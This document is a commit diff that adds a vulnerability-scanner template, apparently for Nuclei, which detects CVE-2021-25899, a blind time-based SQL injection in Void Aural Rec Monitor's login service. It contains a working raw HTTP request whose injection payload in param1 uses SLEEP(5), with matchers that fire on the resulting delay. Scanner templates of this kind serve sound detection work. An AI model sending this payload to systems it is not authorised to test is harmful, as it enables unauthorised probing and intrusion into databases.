Add CVE-2021-25899
parent
1212455659
commit
ebf62bcc48
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2021-25899
|
||||
|
||||
info:
|
||||
name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
An issue was discovered in svc-login.php in Void Aural Rec Monitor 9.0.0.1. An unauthenticated attacker can send a crafted HTTP request to perform a blind time-based SQL Injection. The vulnerable parameter is param1.
|
||||
reference:
|
||||
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25899
|
||||
classification:
|
||||
cve-id: CVE-2021-25899
|
||||
tags: cve,auralrecmonitor,cve2021,sqli
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy¶m2=test
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue